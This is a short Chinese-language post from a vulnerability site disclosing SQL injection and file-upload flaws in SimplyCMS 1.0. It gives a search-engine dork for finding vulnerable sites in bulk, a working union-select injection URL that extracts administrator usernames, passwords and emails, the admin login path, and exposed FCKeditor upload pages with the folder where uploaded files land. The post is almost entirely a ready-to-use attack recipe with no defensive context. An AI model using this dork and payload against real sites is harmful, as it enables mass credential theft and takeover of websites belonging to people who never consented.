漏洞时代 - 最新漏洞_0DaY5.CoM漏洞时代 - 最新漏洞_0DaY5.CoM

SimplyCMS 1.0 SQl注入和上传漏洞

 

SimplyCMS 1.0  SQl注入和上传漏洞

 

批量:inurl:"index.php?subid=" "Powered by DST - SimplyCMS"

 

EXP:
http://www.0day5.com/index.php?subid=7[sql]

 

http://www.0day5.com/index.php?subid=7'+and+1=2+union+select+group_concat(ct,0x3a,username,0x3a,adminpass,0x3a,adminemail)+from+adminconf-- -

 

后台登入: http://www.0day5.com/cms/index.php

 

 

 

上传漏洞

 

http://www.0day5.com/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/php/connector.php
http://www.0day5.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html
http://www.0day5.com/FCKeditor/editor/filemanager/upload/test.html
http://www.0day5.com/FCKeditor/editor/filemanager/browser/default/frmupload.html

 

你的文件地址:

 

http://www.0day5.com/cms/myFiles/Image/

本原创文章未经允许不得转载 | 当前页面:漏洞时代 - 最新漏洞_0DaY5.CoM » SimplyCMS 1.0 SQl注入和上传漏洞

评论